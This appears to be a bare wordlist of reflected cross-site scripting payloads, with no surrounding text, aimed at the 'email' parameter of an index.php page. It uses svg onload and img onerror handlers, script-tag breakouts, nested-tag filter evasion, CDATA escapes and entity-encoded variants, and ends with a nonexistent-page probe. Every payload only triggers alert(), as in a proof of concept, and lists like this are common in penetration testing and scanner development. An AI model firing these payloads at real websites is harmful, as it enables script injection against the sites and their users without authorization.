index.php?email="><svg/onload=alert()>
index.php?email='><img%20src=GKX%20onerror=alert``>
index.php?email=one%40two.com%40%22><svg/onload=alert()>
index.php?email=</script><script>alert(1)</script>
index.php?email="-alert(1)-"'-alert(1)-'
index.php?email=`-alert(1)</script><script>`
index.php?email="'><scr<script>alert()</sc<script>ript>
index.php?email='">`-alert`1`]]></script><svg><script>`<![CDATA[
index.php?email='"%20/autofocus/onfocus=alert()>
index.php?email=%26apos;-alert()-%26apos;%26quot;-alert()%26sol;%26sol;
nonexistent.php